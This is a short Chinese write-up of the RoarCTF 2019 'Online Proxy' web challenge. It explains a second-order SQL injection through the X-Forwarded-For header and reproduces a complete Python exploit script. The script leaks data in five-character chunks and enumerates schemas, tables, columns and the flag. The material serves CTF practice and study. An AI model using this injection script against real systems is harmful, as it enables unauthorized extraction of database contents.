[RoarCTF 2019]Online Proxy
題目復現鏈接:https://buuoj.cn/challenges
參考鏈接:官方wp
看到記錄數據和源代碼里面注釋中的ip地址,猜測是把客戶端的IP地址記錄到數據庫當中。
經過嘗試發現添加X-Forwarded-For可以修改ip,找到注入點
接下來我的思路是比較常規的時間盲注,趙師傅則是將字符轉為數字直接輸出,效率高得多,貼出來學習一下
#!/usr/bin/env python3
import requests
target = "http://localhost:8302/"
def execute_sql(sql):
print("[*]請求語句:" + sql)
return_result = ""
payload = "0'|length((" + sql + "))|'0"
session = requests.session()
r = session.get(target, headers={'X-Forwarded-For': payload})
r = session.get(target, headers={'X-Forwarded-For': 'glzjin'})
r = session.get(target, headers={'X-Forwarded-For': 'glzjin'})
start_pos = r.text.find("Last Ip: ")
end_pos = r.text.find(" -->", start_pos)
length = int(r.text[start_pos + 9: end_pos])
print("[+]長度:" + str(length))
for i in range(1, length + 1, 5):
payload = "0'|conv(hex(substr((" + sql + ")," + str(i) + ",5)),16,10)|'0"
r = session.get(target, headers={'X-Forwarded-For': payload}) # 將語句注入
r = session.get(target, headers={'X-Forwarded-For': 'glzjin'}) # 查詢上次IP時觸發二次注入
r = session.get(target, headers={'X-Forwarded-For': 'glzjin'}) # 再次查詢得到結果
start_pos = r.text.find("Last Ip: ")
end_pos = r.text.find(" -->", start_pos)
result = int(r.text[start_pos + 9: end_pos])
return_result += bytes.fromhex(hex(result)[2:]).decode('utf-8')
print("[+]位置 " + str(i) + " 請求五位成功:" + bytes.fromhex(hex(result)[2:]).decode('utf-8'))
return return_result
# 獲取數據庫
print("[+]獲取成功:" + execute_sql("SELECT group_concat(SCHEMA_NAME) FROM information_schema.SCHEMATA"))
# 獲取數據庫表
print("[+]獲取成功:" + execute_sql("SELECT group_concat(TABLE_NAME) FROM information_schema.TABLES WHERE TABLE_SCHEMA = 'F4l9_D4t4B45e'"))
# 獲取數據庫表
print("[+]獲取成功:" + execute_sql("SELECT group_concat(COLUMN_NAME) FROM information_schema.COLUMNS WHERE TABLE_SCHEMA = 'F4l9_D4t4B45e' AND TABLE_NAME = 'F4l9_t4b1e' "))
# 獲取表中內容
print("[+]獲取成功:" + execute_sql("SELECT group_concat(F4l9_C01uMn) FROM F4l9_D4t4B45e.F4l9_t4b1e"))